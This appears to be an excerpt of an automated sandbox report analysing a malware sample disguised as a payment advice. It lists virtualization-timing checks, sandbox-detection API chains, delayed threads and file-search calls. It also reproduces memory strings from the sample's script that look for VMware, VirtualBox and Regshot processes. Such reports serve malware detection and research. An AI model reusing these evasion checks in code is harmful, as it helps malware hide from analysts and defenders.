          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603300172.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1602379290.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, fjrpidauk.jpg.0.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESM5
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, fjrpidauk.jpg.0.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000002.1607113781.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603533350.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN(
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000002B59904 second address: 0000000002B5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000002B59B6E second address: 0000000002B59B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Found API chain indicative of sandbox detection
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_6-100289
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Windows\explorer.exe TID: 4788Thread sleep time: -10078000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4788Thread sleep time: -9796000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932Thread sleep count: 170 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932Thread sleep time: -340000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932Thread sleep count: 9802 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932Thread sleep time: -19604000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5039Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4898Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 9802Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpAPI coverage: 4.6 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 0.8 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409AA0 rdtsc 14_2_00409AA0
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeAPI call chain: ExitProcess graph end nodegraph_0-25253
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then"
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603167171.0000000000F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C7S
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603167171.0000000000F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
          Source: fjrpidauk.jpg.0.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
          Source: fjrpidauk.jpg.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
          Source: explorer.exe, 0000000F.00000002.3856158250.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exeteM8
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenU6
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenU68
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: fjrpidauk.jpg.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then&
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: uaabfk.icm.0.drBinary or memory string: hF2gsx3i60QuAB24U6xnv008E1r8PTZi58o47x15qEmU8532NW553R2YdA858l1lX8y8X8q119o03NZX84rTH02P5
          Source: fjrpidauk.jpg.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603000018.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603076190.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601700548.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1602242665.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601571668.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: fjrpidauk.jpg.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051E6A3 VirtualQuery,GetSystemInfo,0_2_0051E6A3
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0050A69B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0051C220
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052B348 FindFirstFileExA,0_2_0052B348
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_001DE387
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_001EA0FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_001EA488
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E65F1 FindFirstFileW,FindNextFileW,FindClose,6_2_001E65F1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001AC642 FindFirstFileExW,6_2_001AC642
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E7248 FindFirstFileW,FindClose,6_2_001E7248
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_001E72E9
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001DD836
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001DDB69
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_001E9F9F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A5589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_00A5589A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A54EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00A54EC1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A50207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_00A50207
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A63E66 FindFirstFileW,FindNextFileW,FindClose,16_2_00A63E66
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A4532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_00A4532E
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00175D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00175D78
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00527DEE mov eax, dword ptr fs:[00000030h]0_2_00527DEE
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00195078 mov eax, dword ptr fs:[00000030h]6_2_00195078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4164 mov eax, dword ptr fs:[00000030h]14_2_017A4164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4164 mov eax, dword ptr fs:[00000030h]14_2_017A4164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01768158 mov eax, dword ptr fs:[00000030h]14_2_01768158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]14_2_01764144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]14_2_01764144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01764144 mov ecx, dword ptr fs:[00000030h]14_2_01764144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]14_2_01764144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01764144 mov eax, dword ptr fs:[00000030h]14_2_01764144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6154 mov eax, dword ptr fs:[00000030h]14_2_016D6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6154 mov eax, dword ptr fs:[00000030h]14_2_016D6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC156 mov eax, dword ptr fs:[00000030h]14_2_016CC156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01700124 mov eax, dword ptr fs:[00000030h]14_2_01700124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01790115 mov eax, dword ptr fs:[00000030h]14_2_01790115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177A118 mov ecx, dword ptr fs:[00000030h]14_2_0177A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177A118 mov eax, dword ptr fs:[00000030h]14_2_0177A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177A118 mov eax, dword ptr fs:[00000030h]14_2_0177A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177A118 mov eax, dword ptr fs:[00000030h]14_2_0177A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov eax, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E10E mov ecx, dword ptr fs:[00000030h]14_2_0177E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017001F8 mov eax, dword ptr fs:[00000030h]14_2_017001F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A61E5 mov eax, dword ptr fs:[00000030h]14_2_017A61E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov ecx, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174E1D0 mov eax, dword ptr fs:[00000030h]14_2_0174E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017961C3 mov eax, dword ptr fs:[00000030h]14_2_017961C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017961C3 mov eax, dword ptr fs:[00000030h]14_2_017961C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175019F mov eax, dword ptr fs:[00000030h]14_2_0175019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178C188 mov eax, dword ptr fs:[00000030h]14_2_0178C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178C188 mov eax, dword ptr fs:[00000030h]14_2_0178C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01710185 mov eax, dword ptr fs:[00000030h]14_2_01710185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01774180 mov eax, dword ptr fs:[00000030h]14_2_01774180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01774180 mov eax, dword ptr fs:[00000030h]14_2_01774180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA197 mov eax, dword ptr fs:[00000030h]14_2_016CA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA197 mov eax, dword ptr fs:[00000030h]14_2_016CA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA197 mov eax, dword ptr fs:[00000030h]14_2_016CA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FC073 mov eax, dword ptr fs:[00000030h]14_2_016FC073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01756050 mov eax, dword ptr fs:[00000030h]14_2_01756050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D2050 mov eax, dword ptr fs:[00000030h]14_2_016D2050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766030 mov eax, dword ptr fs:[00000030h]14_2_01766030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA020 mov eax, dword ptr fs:[00000030h]14_2_016CA020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC020 mov eax, dword ptr fs:[00000030h]14_2_016CC020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01754000 mov ecx, dword ptr fs:[00000030h]14_2_01754000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01772000 mov eax, dword ptr fs:[00000030h]14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
